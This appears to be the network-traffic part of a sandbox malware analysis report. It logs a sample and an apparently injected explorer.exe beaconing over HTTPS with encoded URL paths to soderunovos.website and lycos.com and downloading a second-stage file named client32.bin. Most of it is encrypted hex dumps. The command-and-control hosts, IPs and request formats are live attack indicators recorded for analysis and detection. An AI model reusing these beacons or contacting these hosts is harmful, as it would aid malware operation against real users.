2021-11-23 19:59:23 UTC	180	IN	Data Raw: 3d 3b 53 33 e9 23 05 65 c0 44 5b ca ce a5 e4 ac a5 e6 d3 da 25 d9 4c 1e fa 52 4d e7 67 59 a7 ba 6e 0b cc d9 ab 48 4a 6d 3a 95 e3 f3 40 d2 27 fb b0 d4 0a 5f 05 e2 a1 cf 93 62 ed 68 50 ec 69 5c 6b 91 91 06 3c e9 ff dd 6c 96 1d 73 a8 45 bf 64 37 6c b0 94 b9 72 3c 09 54 f1 6c 0a f4 55 d9 e4 2f 8e ef 7c 4e 07 7b ea cc 78 24 7d 87 f0 cd 0a 99 5a 45 fd c4 cb e4 a7 7f a1 ca cb 69 3c 65 45 24 b0 e0 2e 7e 61 75 de c8 20 f0 68 55 4f 6e b1 f0 39 92 38 57 a8 29 74 ff 7c f2 5b e2 5f 15 b9 ce ad 4e ff e9 a2 9c 2d 1f 05 1f 19 53 fc e8 9e 84 a0 2d cd 87 99 f0 2a 5f a4 e4 8e 6f ef 20 61 f7 89 ab c2 5b 7a 02 52 9b 3c 5d be e4 fa f6 d1 c0 fb a3 29 38 fe 72 9b 84 88 52 75 87 14 88 9c da 54 d2 3a d6 59 42 a2 e9 e9 61 8f c3 ef 64 8f 8c 47 16 31 5a ce fb 30 fc 50 18 c7 5c 21 ec Data Ascii: =;S3#eD[%LRMgYnHJm:@'_bhPi\k<lsEd7lr<TlU/\|N{x$}ZEi<eE$.~au hUOn98W)t\|[_N-S-*_o a[zR<])8rRuT:YBadG1Z0P\!
2021-11-23 19:59:23 UTC	196	IN	Data Raw: 01 38 5f b6 31 de 97 47 a4 b0 4c 5e 62 71 78 86 67 14 e6 ab ad 90 62 51 19 41 01 7c 93 5b 75 58 8b a0 7a 50 4d 20 7e a3 d2 72 de cb 55 89 9d c9 6f 38 b5 b2 3f 13 59 32 48 38 95 b1 e7 84 92 60 98 0c 46 e5 c7 5d 34 43 9f 5f 38 a6 47 1b a4 28 b9 6e 9f c5 7f 52 46 3d 44 c5 32 7e af f6 a1 b6 81 15 57 3e 9b ae 15 f4 ac ff 19 a0 69 4f b8 e4 2e 5d 59 bf f4 67 b6 76 fb 21 dd 86 7a 0e 9e 3a 92 ec 23 ba b2 cd 30 d9 2b 97 91 ef ff b7 14 93 5c 85 bd bd b9 4a a8 83 7b eb de d8 dd 7a 66 4f 3d df 15 91 ac 4b fe 5c c7 07 97 20 56 7d 92 f8 62 54 0f c9 e9 fd ab 24 ed 89 67 23 b8 10 ad e4 eb 83 91 98 d7 8f 3a 9a ae 67 db 13 07 74 67 7d d6 2b 85 28 62 54 55 e0 ca 50 81 1b 94 e0 02 5d 3c 87 45 9a c8 9a 85 ce bb 58 99 c2 84 99 30 98 e5 ed 44 44 12 09 be c6 6b 4c 51 13 de 86 c5 Data Ascii: 8_1GL^bqxgbQA\|[uXzPM ~rUo8?Y2H8`F]4C_8G(nRF=D2~W>iO.]Ygv!z:#0+\J{zfO=K\ V}bT$g#:gtg}+(bTUP]<EX0DDkLQ
2021-11-23 19:59:23 UTC	212	IN	Data Raw: ad 95 af 16 70 68 a2 99 72 70 f9 85 97 9b b6 9a 7a 7e f5 55 ee a8 81 b1 49 ca 42 95 89 e9 3a 17 1c ab 37 67 95 91 6c 02 39 68 43 8e e5 5d 59 84 55 c1 19 6a 54 21 53 4f 72 f7 45 17 f1 6b c6 8e 53 8a de 93 7b 9c 4b fd 8e 67 34 ac 75 33 05 d9 7c da 5f 15 63 c2 79 2f 62 09 1d b6 47 30 c1 53 2f 73 1a a0 01 fd de 94 7e 59 2b 91 6b 39 44 04 07 f0 10 ed 45 77 2c 05 9e 46 ed 26 4c 74 5d 8b 91 3c cd 16 5a 94 06 ad f9 5f 69 93 4b 95 b4 91 39 ed 5c db e2 33 14 77 5e 72 83 3e 30 e9 67 aa 95 a2 99 95 58 22 0e d3 6f 1c 08 d2 91 90 c7 2d 28 eb 30 dd 39 79 31 33 cf b7 b1 34 0c dd 11 d1 e0 4a 12 a3 4d 03 d0 08 84 18 2e 1e 4a 27 fe 19 f8 47 83 12 09 b0 71 ae 2c 77 45 76 12 4b 08 fc 9e 71 c7 67 17 fc b7 de 65 c2 d6 3d bf 03 1a da 36 97 67 66 40 0a 24 b8 ae e6 cc c8 35 ef 2d Data Ascii: phrpz~UIB:7gl9hC]YUjT!SOrEkS{Kg4u3\|_cy/bG0S/s~Y+k9DEw,F&Lt]<Z_iK9\3w^r>0gX"o-(09y134JM.J'Gq,wEvKqge=6gf@$5-
2021-11-23 19:59:23 UTC	228	IN	Data Raw: 07 1b 95 21 da f3 d3 77 d5 ae 62 cb 93 a2 ba c6 c1 c2 9c 24 da 0a 37 3d 16 2c 44 e0 f1 82 d3 e5 7d cb 98 74 ea 6f 14 68 ea 2e a5 95 2f 2a 54 17 f3 17 e6 a4 56 2d 7c 8e f9 70 2b 03 c6 bd d3 be bf 4b 68 d0 28 fe c8 67 12 13 2a 7d 33 0d c4 c7 aa de e1 d0 1a fb d4 a1 39 86 20 fb 78 2a fb 32 ca 1c 3f 0e 66 59 23 2d ef a7 35 de d0 91 dc b1 8d 9c 9f d2 63 0d ba 71 cc dc c7 35 5c 94 d0 80 ab e4 95 e2 4c d7 27 2f 28 04 34 d9 3c a8 22 99 3c 86 83 80 96 92 9a 20 a8 23 1e ce 2c 19 43 8a 61 30 26 b4 01 74 53 7c 33 40 36 a0 52 24 62 fb 46 ff 88 92 df c3 83 c9 55 ac c6 8e 7c 88 2c 72 92 2f 82 a3 90 9c 75 29 06 94 33 88 d5 4f 4b e4 44 ce b8 d5 f9 e7 b9 f9 7a 35 5b d8 88 cd d8 d4 c9 f5 1a a3 a5 89 da f0 e4 29 8b 0f 85 f1 91 94 d2 6a b4 cf 5d 42 aa 62 2b fc 5d 43 cb 5d f0 Data Ascii: !wb$7=,D}toh./TV-\|p+Kh(g}39 x*2?fY#-5cq5\L'/(4<"< #,Ca0&tS\|3@6R$bFU\|,r/u)3OKDz5[)j]Bb+]C]
2021-11-23 19:59:23 UTC	244	IN	Data Raw: 41 b7 e9 4a 03 24 38 c0 6f 17 65 d1 07 a5 a1 7a e6 32 b0 76 ca 66 62 d0 27 32 c1 c3 13 4e 54 1f bd b3 ae 6c dc 15 cc 02 93 0a 00 e1 33 f8 c6 1e 1b 21 f1 4f b0 f1 62 44 da 74 40 95 04 33 7a 0c d1 f3 26 99 38 64 81 6c c3 bb 70 cd 34 7c 9e cd 33 8f c1 ab 47 85 99 16 87 df 41 28 6a d6 d0 14 a1 c4 7e 5f 71 1e 7c e8 14 85 05 25 b0 12 7a e4 97 66 dc a7 67 b2 79 fb b9 45 d8 0f c2 63 01 0c 35 ed 28 5f 0d c4 7f 52 a1 e7 2a d4 9d db 7f 72 37 aa 38 e1 e2 06 0c a4 41 85 fb 1d 10 3e ab 11 5a c8 33 fd f7 2e 44 67 98 e2 cb 23 82 79 17 a5 60 a9 c4 56 d7 c3 3a a0 e1 0a 2a 4e 4b e3 3d 75 b3 c6 3c 48 1c bd 53 ce ec 95 62 96 fc 34 c4 4d ca 15 47 67 19 9c d2 7b 64 93 fa 99 c6 24 be 80 ac 8b 95 d5 5e 87 d3 8e 1e fe 2e f7 4e 1f 72 b5 17 2c 6d 72 33 d1 6e 1a ec 31 16 ab 78 95 24 Data Ascii: AJ$8oez2vfb'2NTl3!ObDt@3z&8dlp4\|3GA(j~_q\|%zfgyEc5(_Rr78A>Z3.Dg#y`V:NK=u<HSb4MGg{d$^.Nr,mr3n1x$
2021-11-23 19:59:23 UTC	260	IN	Data Raw: a8 0c dc 00 8a 38 ca 2d 7d b3 9e 44 6c 42 b7 d1 7a 69 4a 49 cd a1 3d 97 ab 5f 13 aa 5c fe 5d 46 da 6c b3 21 83 48 e0 9d 35 e9 3b c0 29 3b 41 99 e6 16 8c a1 99 a4 9e 66 97 5b 9c c1 83 15 00 3e d9 65 0a 07 ae c4 00 84 08 66 6e f4 27 ad 9b 4d d6 64 a6 22 79 a3 88 94 be 6b 6c a5 cc d1 65 ec 97 c7 54 0b d3 15 06 cd b1 3f 32 d6 33 83 fb c2 88 66 f4 eb a6 1b 02 1b 62 ef 58 f2 82 6c a6 41 fc 4d 19 f7 bd 31 4a 49 03 d5 70 19 89 00 25 54 26 66 ee e9 81 f2 26 e0 30 34 f7 94 bf 79 3c 5f 30 f0 af 1a 4d 83 2f 15 a5 b4 f3 0e 2e 81 77 37 79 c2 15 b0 eb c9 d1 55 20 04 99 02 5c f2 6d 88 83 b7 58 98 c0 6b df af 0e d6 1e 50 e0 c7 8b 91 da f2 b0 3f 98 72 1b f0 44 7f 46 18 95 61 a3 eb 20 df 5f f6 47 19 6b 83 1f e9 8e 39 0e a5 ed 0d 01 5c 27 21 bb 76 e8 b5 3e 18 12 76 13 c8 82 Data Ascii: 8-}DlBziJI=_\]Fl!H5;);Af[>efn'Md"ykleT?23fbXlAM1JIp%T&f&04y<_0M/.w7yU \mXkP?rDFa _Gk9\'!v>v
2021-11-23 19:59:23 UTC	276	IN	Data Raw: 66 b0 ca 68 ae 46 a7 86 16 50 94 22 11 fb 6d f0 74 e2 9d 75 78 b4 9c db ff a4 b1 f0 f3 a4 7e d7 bd d5 14 5b cf ce 7e fc ce 65 7a 99 68 3a bd 81 79 67 09 82 db 91 1c a5 14 99 a8 e8 9f 82 b2 18 31 fe 54 43 7f a2 c4 d1 77 e3 71 c7 57 40 28 ad 80 12 4a 0f f8 29 38 51 68 88 89 bd c1 25 ff 87 8a 86 a3 76 b2 91 1f fc 50 45 7f 89 9b 7b 0e 73 20 77 7e c8 63 06 4b c3 f0 f1 c2 43 c4 4a df 32 e2 b8 23 ac 72 82 f1 6a 6a 5e 7a bb a5 8d e4 ce 2a b2 41 89 0a 90 92 a9 a1 3b 1c 10 a1 e4 7b 73 dc 24 6f 59 36 48 b0 55 ed e6 de 99 7b 54 b8 c0 b4 83 c3 e5 80 e2 91 17 0d 0a 34 bf b2 c3 02 4b b1 d1 12 d2 b1 b7 75 86 56 f8 b2 d8 19 85 03 76 30 4e 4c 91 e4 54 73 3a f2 1b 97 84 7c 6d 0a 0e 68 8b f7 cc 54 c2 ce 97 d1 30 a4 31 a4 ef 1a 06 d7 09 c4 bc c8 0d 21 93 17 dc fd e3 20 42 05 Data Ascii: fhFP"mtux~[~ezh:yg1TCwqW@(J)8Qh%vPE{s w~cKCJ2#rjj^z*A;{s$oY6HU{T4KuVv0NLTs:\|mhT01! B
2021-11-23 19:59:23 UTC	292	IN	Data Raw: 28 f3 a6 d9 af 00 74 dd 0d ce 6d a3 4f 08 24 0e f7 5a bf 2f 50 ca ba da 39 62 64 76 65 70 c0 a4 04 ba 86 74 c8 93 c7 c5 15 c4 23 6f ef ba e2 fb 45 df b8 c1 1a 3d 8e 52 5f 76 22 0a a1 7a 6c cd d8 ff 78 33 3a dc dc d4 fb b5 c6 a5 a3 1c 4c 23 bd 60 b0 c0 32 83 ad 9b 32 9d fe 1e 4b 66 16 42 f6 07 93 74 34 79 c3 c8 38 1e 51 9e eb 8e 5c 07 c4 20 ce b3 78 f2 0f 9d 4e ba 47 88 24 24 56 9e dd 19 3f 5d 20 37 eb b2 5f b8 f7 41 28 d0 28 6e d2 6c a1 ca 61 65 ed 03 dc 39 4a 4b 54 58 96 f5 5b 75 91 6c 67 ef 5e b5 29 ed ef 55 0b 7f 05 d4 ae 45 9f d2 0e 7c f6 d3 12 a3 b8 aa 25 b4 98 ba 2d 80 01 a9 d2 f6 4e 59 92 f5 a6 91 08 f8 2e eb fe 27 5b b3 47 55 af ba 71 e1 83 ca 2c bb aa 91 72 07 85 72 44 10 16 f1 d8 73 5a fe 66 22 fa 46 49 73 30 77 14 54 80 cf af 2a 5e 17 63 1f 25 Data Ascii: (tmO$Z/P9bdvept#oE=R_v"zlx3:L#`22KfBt4y8Q\ xNG$$V?] 7_A((nlae9JKTX[ulg^)UE\|%-NY.'[GUq,rrDsZf"FIs0wT*^c%
2021-11-23 19:59:23 UTC	308	IN	Data Raw: 58 ba 00 0a 5b f6 36 71 13 6d e8 44 f8 52 0b d3 ba b4 db 3b 95 c1 3a 40 a3 49 42 02 18 3a a2 b7 a7 37 ca f8 58 be 4a 05 b4 d6 58 97 9e 04 21 ea 18 09 54 c9 d4 b4 a7 3c 8f a3 fc 38 7c c7 84 b8 f1 f5 2d 62 f8 67 44 fc f4 e0 48 1d 92 59 2c 25 8e 89 79 3d 49 0f 9e 65 d9 94 b2 be c4 2f 97 84 c7 b2 f5 b3 59 82 51 4e 39 8c 3f 29 be 5b b8 6c 5a 37 eb b7 d7 eb be 2d a0 5d 74 45 36 7d d4 08 78 a0 9a 04 84 f5 84 95 36 b4 15 81 4c 2f 80 f3 39 8e c0 da d0 35 67 6b c0 75 ec b8 9d 3f e7 9e ba 64 df 54 cb f6 01 a3 f1 8b 65 1d d7 d3 37 5d 00 f6 51 36 9a a3 21 3c 8b 07 a0 d6 1a 64 21 9d 28 90 af da c5 73 8d 80 7f 78 f2 89 f0 fb 63 02 79 04 67 44 f6 60 97 2e 1d 71 1c f8 32 75 08 e6 c0 91 a4 97 d7 5b f4 d4 1e 57 5f 7d 05 ee cc d4 9c db 06 e9 e7 eb 71 da 96 37 80 95 49 6c 6a Data Ascii: X[6qmDR;:@IB:7XJX!T<8\|-bgDHY,%y=Ie/YQN9?)[lZ7-]tE6}x6L/95gku?dTe7]Q6!<d!(sxcygD`.q2u[W_}q7Ilj
2021-11-23 19:59:23 UTC	324	IN	Data Raw: d5 f6 69 9f 59 ac c3 d7 b2 42 ed 3b bf 58 12 14 e9 65 de 16 22 2f 00 8e 59 c5 44 49 d5 25 be 01 2e ed 1a 25 70 42 8c 3c eb 37 e0 f7 93 fd d2 c2 f2 b6 c2 22 3c f7 74 c3 a6 a0 ce 6d c1 87 7a f0 5b 7a dd 46 4e ae f3 c9 a0 ff 71 0f 69 8e d1 0e ec a5 c9 3b c1 a5 04 d2 9c a0 95 c4 73 55 fe e3 6a c9 70 b6 f8 4c 9b 15 b5 91 b8 b0 93 3a d9 83 5f d3 73 80 5f 8a 53 ec f1 bf 9e 64 f1 ea 79 14 1f 4a 27 0a dd 01 06 fa 8d c5 9c 60 38 0f 45 3b c7 12 e8 cc da e0 f7 1f 02 73 e8 1e da de 28 87 fb 0b 51 62 2e bc 84 13 4d 68 d1 12 d2 a9 b1 d9 35 19 2a aa 76 ce dd 56 b2 ae 3a 29 dd fa d9 c3 2d df cb 6d fe ff f0 36 a6 b1 fe 22 ee c7 e1 1c b2 95 19 d1 45 67 fe 64 a3 2a 86 41 e5 aa e8 25 f1 dd 00 0c 55 ca ab 22 29 93 9c c4 b1 cc 9f 8a 1c e9 22 e6 ff 56 ce 0f 4b b4 58 36 6f 4e 92 Data Ascii: iYB;Xe"/YDI%.%pB<7"<tmz[zFNqi;sUjpL:_s_SdyJ'`8E;s(Qb.Mh5vV:)-m6"EgdA%U")"VKX6oN
2021-11-23 19:59:23 UTC	340	IN	Data Raw: ba d3 69 92 55 51 28 e0 66 fd ef 56 0b 7a 9c 06 ce e6 62 74 a5 77 05 d6 9e da 07 9f 99 36 ee 7b 58 31 85 89 e2 78 98 53 5b 19 2e ac 3b 83 cb 74 43 71 0f 62 72 06 87 1b a5 19 48 5b ab 8e 84 68 ce 4f b6 6d 24 6d fe 31 43 57 82 ce e8 ef b7 16 31 f4 eb d2 03 89 38 1e f4 43 0b 12 7d 0a d5 32 0b da 21 4c 7d f2 7d 1d c8 97 9d 76 e6 42 a4 46 79 76 29 25 b2 79 41 65 07 f8 13 26 31 16 db 0f d1 53 7b 94 46 78 8d ba 70 37 e0 79 e6 3a 98 ad 53 94 6e 52 df c8 dc 1c 46 24 d1 3f 93 5b ba b7 9d 99 97 9b 18 29 b7 89 d4 05 49 be 33 6d 14 79 25 94 0d c9 d1 bd 40 54 4b 37 01 94 07 42 d2 ba 4c f6 fb 03 21 f7 da 37 84 3e 01 c7 16 66 00 7a e2 4f ef 0a 9f 49 96 ab 26 0d e2 f4 68 cf 2d c0 f9 28 4f 27 db ba a1 a8 0f ba 4c 83 f0 63 10 cd 62 03 cb a4 ea 1b a8 47 74 ad b5 06 b0 78 2b Data Ascii: iUQ(fVzbtw6{X1xS[.;tCqbrH[hOm$m1CW18C}2!L}}vBFyv)%yAe&1S{Fxp7y:SnRF$?[)I3my%@TK7BL!7>fzOI&h-(O'LcbGtx+
2021-11-23 19:59:23 UTC	356	IN	Data Raw: a2 51 bf e9 dd c4 dc 11 50 f5 2c 06 99 37 cb f5 b1 cd 77 b1 95 99 f1 16 31 e6 95 fd a7 e5 ab b2 59 a6 3f ac 39 47 7e f6 f6 73 b5 31 53 11 73 60 7f 6e 5c e1 c0 f7 89 28 5f e9 99 78 cf 92 4b 0e 92 f4 9c 0a 94 26 71 17 73 4b 1f 0c 61 99 3e 15 24 42 63 2f 6f fd 0e f2 31 9a 31 65 25 0e 95 b4 fa 27 2e 61 87 0a dc 42 1c b9 28 86 45 0b b7 ed 82 93 89 0b 09 43 27 bf ff 81 b0 d7 2d d6 98 21 45 2c 68 46 70 f8 a1 e3 8b 55 7e 4b 47 a8 5f b8 34 a1 aa 8f 73 d3 36 26 57 0e c5 d3 96 b8 4e 69 4b ab e0 75 68 f2 d4 04 b8 bf c3 6d da af 01 68 b0 01 cd 86 0c 21 8c 66 3b 45 e4 3f 10 dd 4e 1f 92 80 88 fd 3e 99 99 7f cd 93 28 13 74 06 2d 88 ab 9f de 37 c4 c2 6c 45 f6 8b 79 df 6c b7 af d0 04 70 05 24 b9 31 4d 49 15 d2 85 da 8f 83 e3 51 5d 83 33 60 90 96 90 04 e4 26 74 80 c9 fb 21 Data Ascii: QP,7w1Y?9G~s1Ss`n\(_xK&qsKa>$Bc/o11e%'.aB(EC'-!E,hFpU~KG_4s6&WNiKuhmh!f;E?N>(t-7lEylp$1MIQ]3`&t!
2021-11-23 19:59:23 UTC	372	IN	Data Raw: b3 7a 45 d6 5a bd b9 d2 8f 7a ad cc c2 8d 9e 3c 9b 5b fc 87 4c 6a fc 57 86 09 5b a4 03 f4 8b ad 85 81 91 87 e1 0e 33 1e ec b5 b7 7f 88 96 69 90 75 27 ef 1b a7 29 6e a4 95 00 5c a2 95 8b 2c 80 0a 6b 81 db 1b 99 4e b3 95 1e e9 33 f7 3e e6 de a7 50 d2 f2 e8 f7 a2 17 78 67 21 20 5e b9 5c 4d db 89 2b 00 b6 d8 76 3b e1 ae 01 4d 59 12 5d cd 56 ac d9 07 b3 5a 38 6a eb e9 10 f2 0b 1e 97 24 41 7b af ee ad 8f d0 97 01 e3 cf e0 eb 60 9c a0 ed 4b 54 67 82 0f 12 ba a8 2c 33 c2 9f 68 d3 1a 64 74 9b a6 57 41 b6 af 9e bb 48 4d 74 6d 99 e7 cb 70 ca 9f ab 3a 13 a9 c0 e8 80 64 7c ed 38 14 82 83 9f 71 0c bc fd a4 0c da 79 85 5a 99 02 1b 8e 19 08 fe d2 df 43 1e 8e 52 67 dd 6a dc 22 e8 e3 be 97 a0 7a 6a 51 0e c3 e4 62 68 f2 c1 32 88 6e 9e c7 16 26 fb 16 e3 14 60 48 4a e5 f6 20 Data Ascii: zEZz<[LjW[3iu')n\,kN3>Pxg! ^\M+v;MY]VZ8j$A{`KTg,3hdtWAHMtmp:d\|8qyZCRgj"zjQbh2n&`HJ
2021-11-23 19:59:23 UTC	388	IN	Data Raw: 93 03 3b 24 ab 6b 75 d1 e2 80 4f f2 6b 0d 36 0d c1 90 ac 50 e9 f9 05 62 65 ee 00 e3 48 d2 3e 85 4a 10 91 92 8f ae 4f 0d 9e c6 b3 c8 b4 c8 61 17 4c c9 9d 3b 74 2a a5 1b 71 ac b7 3e 98 70 8b e0 ae 87 66 d1 a8 af 43 31 d1 90 d4 cd 59 05 e1 2b 33 bc 30 e9 0c 2d ad bd 0b b5 12 e2 be c0 f4 c5 81 74 c2 55 52 44 26 08 31 c2 ab ec d5 52 bc fb a6 89 b4 4e 1b 8c e5 bb c0 2a 4e 2a 2e 27 bc 06 7b f5 4b ee f9 56 81 f2 31 e6 d7 3d a7 05 e5 65 50 8a f7 23 17 91 e0 b4 9a 1d 28 f2 41 3e ba 5c 47 0d d4 da 4c 5b 41 50 3d 19 c2 fb 02 16 eb dc cb 92 c3 9a 7b 01 4a 37 21 50 fb 36 42 a3 18 71 6b a4 73 c6 1c ff 06 be 0b 9d 7e b7 38 aa 83 f2 80 b2 d2 53 0d 40 8a d9 94 11 39 4b d5 a8 de 68 09 5f a2 af 19 89 70 17 30 ef 50 bc da 8b 7c f6 38 52 ef d7 bf cd 00 fd 6a e3 78 5b 94 bb c0 Data Ascii: ;$kuOk6PbeH>JOaL;tq>pfC1Y+30-tURD&1RNN*.'{KV1=eP#(A>\GL[AP={J7!P6Bqks~8S@9Kh_p0P\|8Rjx[

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.3	49755	89.44.9.140	443	C:\Users\user\Desktop\FpYf5EGDO9.exe

Timestamp	kBytes transferred	Direction	Data
2021-11-23 19:59:23 UTC	402	OUT	GET /jdraw/4HxkLkhxWL_2FVANLY1/THbawZOPrnWBhU0uh241NM/FRF0QIjHzIK9t/dTYxInYO/rat2KiIdmFuMYJV01lFIUuv/pv1M_2F42q/2ghlrrK6HyvaK1iGn/6FWd3U6RwdJs/DwljQfV1T1s/A2jFEhH_2FVbra/gemmgKqmTU3dGSSrHsVgF/6KFwQzXOgNC787ml/o9EUNqnCP/_2FVV.crw HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: soderunovos.website Connection: Keep-Alive Cache-Control: no-cache Cookie: PHPSESSID=hvn8dm2743er2gc0b5q06914n7; lang=en
2021-11-23 19:59:23 UTC	403	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Tue, 23 Nov 2021 12:20:02 GMT Content-Type: application/zip Content-Length: 1847 Connection: close X-Powered-By: PHP/5.4.16 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: public Pragma: no-cache Content-Transfer-Encoding: Binary Content-Disposition: attachment; filename=client32.bin
2021-11-23 19:59:23 UTC	403	IN	Data Raw: a5 bb f0 c6 4e 81 58 fc 3f 81 38 78 06 71 35 94 b5 63 5d f7 3a 90 95 f0 f1 a5 d6 79 e3 d8 4b bd 1a d4 8e 32 9e 2a cb a4 68 98 24 81 6e fe 0f 96 95 8b a8 fe 63 f7 21 de 73 fa 10 4c 93 dd 35 6f 20 a8 a7 2c 46 88 07 86 ca fc b5 19 c6 db f2 00 40 05 7e 0d c2 50 6b 95 b9 fa 24 d2 fb 3b 91 94 11 75 f9 c5 57 51 bf 16 37 8e 92 dc f5 2d 02 85 84 e7 46 ef 6b e7 03 10 2c 60 0b 1b 6a 0f a2 1c 6a d0 df 77 8a 0e ad 0c bd ca 8c 13 d8 4f ef 04 7f aa ca 3c 1c 94 2f d7 84 ed 2c 1e 83 25 24 a9 58 ca 0d 6e fb 63 0b 57 74 2b fc e8 a8 89 b0 34 e4 b3 74 df 0f 54 ee a7 18 f8 d4 4a 37 ff d4 66 6b 78 50 08 88 a4 3b 81 56 7e 13 f2 0e 01 39 69 3b 7e 67 02 64 cb 16 09 13 7b 0e f2 5d 67 bf 8f 80 0d fb e3 b8 8c fb 04 ea 71 9a 50 1f 84 16 26 09 ff 3b 17 10 62 8f 1b 3d 6e 47 69 0d a4 1a Data Ascii: NX?8xq5c]:yK2*h$nc!sL5o ,F@~Pk$;uWQ7-Fk,`jjwO</,%$XncWt+4tTJ7fkxP;V~9i;~gd{]gqP&;b=nGi

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.3	49817	209.202.254.90	443	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
2021-11-23 20:01:38 UTC	405	OUT	GET /images/D9OpVtR6ch7yaXQM/EaD5xW8ABdTYyBP/Gt4cJ_2FjFXycO4TGu/MCD9o93qF/gcXCxsJliTt7CsKUUThQ/_2BQOzGD7VTScWFbBq7/rYz6zqd1hDOgClF7ZjyuP0/PVO4xmcJgwOqT/bRFkn69p/urNzBLvaZk_2FHiycO_2Fnk/NDLAeqS6wj/HuFpoxGxaXolfyDuy/j3x_2FwiqF8u/_2BNOdDri_2/BxGc1t_2BdTChs/9z_2Fo9enBDmQdKXyPaDP/tbX9QQQWLbdOHznP/nJCwvBsm_2F/C.jpeg HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64) Host: lycos.com Connection: Keep-Alive Cache-Control: no-cache
2021-11-23 20:01:38 UTC	405	IN	HTTP/1.1 302 Found Date: Tue, 23 Nov 2021 20:01:38 GMT Server: Apache Content-Security-Policy: frame-ancestors 'self' *.lycos.com Location: https://www.lycos.com/images/D9OpVtR6ch7yaXQM/EaD5xW8ABdTYyBP/Gt4cJ_2FjFXycO4TGu/MCD9o93qF/gcXCxsJliTt7CsKUUThQ/_2BQOzGD7VTScWFbBq7/rYz6zqd1hDOgClF7ZjyuP0/PVO4xmcJgwOqT/bRFkn69p/urNzBLvaZk_2FHiycO_2Fnk/NDLAeqS6wj/HuFpoxGxaXolfyDuy/j3x_2FwiqF8u/_2BNOdDri_2/BxGc1t_2BdTChs/9z_2Fo9enBDmQdKXyPaDP/tbX9QQQWLbdOHznP/nJCwvBsm_2F/C.jpeg Content-Length: 512 Connection: close Content-Type: text/html; charset=iso-8859-1
2021-11-23 20:01:38 UTC	406	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6c 79 63 6f 73 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 44 39 4f 70 56 74 52 36 63 68 37 79 61 58 51 4d 2f 45 61 44 35 78 57 38 41 42 64 54 59 79 42 50 2f 47 74 34 63 4a 5f 32 46 6a 46 58 79 63 4f 34 54 47 75 2f 4d 43 44 39 6f 39 33 71 46 2f 67 63 58 43 78 73 4a 6c 69 54 74 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://www.lycos.com/images/D9OpVtR6ch7yaXQM/EaD5xW8ABdTYyBP/Gt4cJ_2FjFXycO4TGu/MCD9o93qF/gcXCxsJliTt

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.3	49818	209.202.254.90	443	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
2021-11-23 20:01:38 UTC	407	OUT	GET /images/D9OpVtR6ch7yaXQM/EaD5xW8ABdTYyBP/Gt4cJ_2FjFXycO4TGu/MCD9o93qF/gcXCxsJliTt7CsKUUThQ/_2BQOzGD7VTScWFbBq7/rYz6zqd1hDOgClF7ZjyuP0/PVO4xmcJgwOqT/bRFkn69p/urNzBLvaZk_2FHiycO_2Fnk/NDLAeqS6wj/HuFpoxGxaXolfyDuy/j3x_2FwiqF8u/_2BNOdDri_2/BxGc1t_2BdTChs/9z_2Fo9enBDmQdKXyPaDP/tbX9QQQWLbdOHznP/nJCwvBsm_2F/C.jpeg HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64) Connection: Keep-Alive Cache-Control: no-cache Host: www.lycos.com
2021-11-23 20:01:38 UTC	407	IN	HTTP/1.1 302 Found Date: Tue, 23 Nov 2021 20:01:38 GMT Server: Apache Content-Security-Policy: frame-ancestors 'self' *.lycos.com X-Powered-By: PHP/7.2.24 Location: https://www.lycos.com/images/D9OpVtR6ch7yaXQM/EaD5xW8ABdTYyBP/Gt4cJ_2FjFXycO4TGu/MCD9o93qF/gcXCxsJliTt7CsKUUThQ/_2BQOzGD7VTScWFbBq7/rYz6zqd1hDOgClF7ZjyuP0/PVO4xmcJgwOqT/bRFkn69p/urNzBLvaZk_2FHiycO_2Fnk/NDLAeqS6wj/HuFpoxGxaXolfyDuy/j3x_2FwiqF8u/_2BNOdDri_2/BxGc1t_2BdTChs/9z_2Fo9enBDmQdKXyPaDP/tbX9QQQWLbdOHznP/nJCwvBsm_2F/C.jpeg/ Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.3	49819	209.202.254.90	443	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
